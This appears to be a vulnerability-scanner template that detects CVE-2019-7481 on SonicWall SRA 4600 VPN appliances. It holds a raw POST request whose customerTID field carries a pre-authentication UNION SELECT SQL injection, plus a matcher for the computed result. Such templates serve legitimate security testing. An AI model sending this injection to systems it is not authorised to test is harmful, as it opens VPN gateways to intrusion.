34 lines
952 B
YAML
34 lines
952 B
YAML
id: CVE-2019-7481
|
|
|
|
info:
|
|
name: sonicwall sra 4600 vpn pre-authenticated sql injection
|
|
author: _darrenmartyn
|
|
severity: high
|
|
description: |
|
|
The SonicWall SRA 4600 VPN appliance suffers a pre-authentication SQL injection vulnerability.
|
|
reference:
|
|
- https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/
|
|
tags: cve,cve2019,sonicwall,sqli
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.50
|
|
cve-id: CVE-2019-7481
|
|
cwe-id: CWE-200
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /cgi-bin/supportInstaller HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept-Encoding: identity
|
|
User-Agent: MSIE
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "4220397236"
|
|
part: body
|